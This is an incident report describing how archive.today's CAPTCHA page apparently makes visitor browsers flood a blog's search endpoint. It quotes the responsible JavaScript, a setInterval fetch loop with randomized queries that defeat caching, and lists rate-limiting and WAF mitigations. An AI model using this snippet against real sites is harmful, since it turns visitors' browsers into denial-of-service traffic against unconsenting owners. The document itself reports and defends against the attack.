Investigation

archive.today Is Directing a DDoS Attack Against a Blog

February 2026 · incident report · tags: archive.today, DDoS, web-archives

Quick summary: A confirmed client-side script on archive.today’s CAPTCHA page repeatedly requests a blog’s search URL roughly every 300 milliseconds while the CAPTCHA remains open. That pattern produces sustained, DDoS-like traffic directed at the target site.

What was found

Researchers and the blog owner observed a `setInterval` loop that issues `fetch()` requests to a blog’s search endpoint with randomized query strings, preventing caching and keeping requests constant. The code sample (below) was visible in the CAPTCHA page and reproduced in the original report.

setInterval(function() {
fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
referrerPolicy: "no-referrer",
mode: "no-cors"
});
}, 300);

Plain English: while the CAPTCHA tab stays open, browsers visiting that page repeatedly make requests to the target blog — about three times per second — which over time can overwhelm small or under-provisioned sites.

Why this matters

This behavior can unintentionally (or intentionally) turn ordinary users into traffic generators — effectively weaponizing visitor browsers and producing sustained load that looks like a distributed denial-of-service attack.

Mitigation steps for site owners

Implement rate limiting on search and other high-cost endpoints (return 429 when thresholds are exceeded).
Use CDN or WAF rules to throttle abnormal patterns and block abusive referrers.
Serve cached lightweight results for obviously random search queries.
Collect request headers, timestamps, and user agent samples to support abuse reports.

Read the full report

For complete screenshots, timeline, and the author’s account, see the original investigation: https://gyrovague.com/2026/02/01/archive-today-is-directing-a-ddos-attack-against-my-blog/